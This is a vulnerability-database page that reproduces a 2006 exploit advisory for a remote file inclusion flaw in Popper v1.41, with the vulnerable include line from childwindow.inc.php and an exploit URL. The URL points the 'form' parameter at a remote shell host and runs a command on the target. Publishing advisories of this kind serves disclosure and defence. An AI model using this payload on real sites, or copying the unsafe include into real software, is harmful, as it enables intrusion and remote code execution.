Lucene search

K

popperRFI.txt

🗓️ 13 Sep 2006 00:00:00Reported by SHiKaAType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Popper v1.41 (form) Remote File Inclusion Exploit, Critical Level: Dangerous, Bug in: childwindow.inc.ph

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#==============================================================================================  
#Popper <= v1.41 (form) Remote File Inclusion Exploit  
#===============================================================================================  
#   
#Critical Level : Dangerous   
#   
#Venedor site : http://popper.ractive.ch/   
#   
#Version : v1.41   
#  
#================================================================================================  
#Bug in : childwindow.inc.php  
#  
#Vlu Code :  
#--------------------------------  
#  
# <?php include($form.".form.inc.php");?>  
#  
#================================================================================================  
#  
#Exploit :  
#--------------------------------  
#  
#http://sitename.com/[Script Path]/childwindow.inc.php?form=http://SHELLURL.COM?&cmd=id  
#  
#================================================================================================  
#Discoverd By : SHiKaA  
#  
#Conatact : SHiKaA-[at]hotmail.com  
#  
#GreetZ : CCtream - Cyper-worrier team  
# Special Thx To : Str0ke & simoo  
==================================================================================================  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo